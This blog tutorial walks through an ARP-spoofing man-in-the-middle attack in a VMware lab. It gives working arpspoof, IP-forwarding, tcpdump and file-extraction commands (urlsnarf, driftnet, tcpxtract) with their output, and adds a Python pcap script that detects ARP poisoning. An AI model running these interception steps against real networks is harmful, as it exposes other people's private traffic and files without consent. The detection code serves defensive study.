We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days are switched, it's no longer a case of plugging in & dumping packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz from my SSLSTRIP post and the Image Extraction post.
Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway, so both sides send their traffic through our box.
Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2)
root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:172.16.189.136  Bcast:172.16.189.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.189.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         172.16.189.2    0.0.0.0         UG        0 0          0 eth0

root@bt:~# nmap -sP 172.16.189.1-255
Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST
Nmap scan report for 172.16.189.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.189.2
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for 172.16.189.135
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for 172.16.189.136
Host is up.
Nmap scan report for 172.16.189.254
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds
root@bt:~#
So we have a couple of other hosts there; we will use 172.16.189.135.
We want traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us. We do that with the following arpspoof commands.
Windows host before arpspoof:
C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-50-56-e5-f7-f0     dynamic
arpspoof commands to run on our backtrack box, not forgetting to enable IP forwarding first (otherwise the target's traffic dies at our box instead of being relayed):

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
And our Windows box? Note that the gateway entry now carries our MAC, and the same MAC appears twice in the table:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic
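The poisoned ARP table above is exactly what a defender can look for: one MAC claiming two IP addresses, and the gateway's MAC changing mid-session. The following is an added example (not part of the original post, and not an arpspoof or dsniff tool) that reads a pcap file, looks only at ARP replies, and reports both conditions. Because no capture file is shipped with the post, the sample pcap is constructed in memory from the addresses shown above (gateway 00:50:56:e5:f7:f0, victim 00:0c:29:09:04:71, attacker 00:0c:29:ab:b2:2c); the frame-builder and pcap-writer helpers exist only to produce that sample and write nothing to the network.

```python
"""Flag ARP cache poisoning in a pcap: an IP whose advertised MAC changes, or a MAC
that claims several IPs. Added example; the sample capture is constructed inline."""
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806   # EtherType for ARP (the "0806" column in arpspoof's output)
ARP_REPLY = 2        # ARP opcode 2 = reply ("is-at")

def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))

def arp_reply_frame(sender_mac, sender_ip, target_mac, target_ip):
    """Build a 42-byte Ethernet/ARP reply frame (constructed sample data only)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)        # Ethernet/IPv4, opcode reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp

def pcap_bytes(frames):
    """Wrap frames in a classic little-endian pcap (magic 0xa1b2c3d4, link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1276800000 + i, 0, len(f), len(f)) + f  # ts_sec, ts_usec, incl, orig
    return out

def iter_pcap_frames(data):
    """Yield the raw link-layer bytes of every record in a classic pcap file."""
    endian = "<" if struct.unpack("<I", data[:4])[0] == 0xa1b2c3d4 else ">"
    offset = 24                                   # skip the 24-byte global header
    while offset + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len

def parse_arp_reply(frame):
    """Return (sender_mac, sender_ip) for an Ethernet ARP reply, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if op != ARP_REPLY or hlen != 6 or plen != 4:
        return None
    return mac_str(frame[22:28]), ip_str(frame[28:32])

def find_poisoning(pcap_data):
    """Walk the capture's ARP replies and return a list of alert strings."""
    ip_to_mac, mac_to_ips, alerts = {}, defaultdict(set), []
    for frame in iter_pcap_frames(pcap_data):
        reply = parse_arp_reply(frame)
        if reply is None:
            continue
        mac, ip = reply
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:      # the binding for this IP flipped
            alerts.append(f"{ip} changed from {prev} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:                          # one NIC answering for several hosts
            alerts.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts

# Constructed sample: one genuine gateway reply, then the two spoofed replies from the post.
GATEWAY_MAC, GATEWAY_IP = "00:50:56:e5:f7:f0", "172.16.189.2"
VICTIM_MAC, VICTIM_IP = "00:0c:29:09:04:71", "172.16.189.135"
ATTACKER_MAC = "00:0c:29:ab:b2:2c"
SAMPLE_PCAP = pcap_bytes([
    arp_reply_frame(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # legitimate
    arp_reply_frame(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # "172.16.189.2 is-at attacker"
    arp_reply_frame(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # "172.16.189.135 is-at attacker"
])

if __name__ == "__main__":
    for alert in find_poisoning(SAMPLE_PCAP):
        print("ALERT:", alert)
```

Run it against a real capture by replacing SAMPLE_PCAP with `open("capture.pcap", "rb").read()`. One caveat worth noticing: the tcpdump command later in this post uses the filter `not arp`, so a capture taken that way contains none of the evidence this script keys on; a monitoring capture should keep ARP.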
And of course, kick off your tcpdump session, filtering out the arpspoof traffic so the constant ARP replies don't fill the capture file:

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture-s0
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
So, we have a shiny new file, full of data goodness – what to do with it? There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**
Set up the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps
Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0

root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html
There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.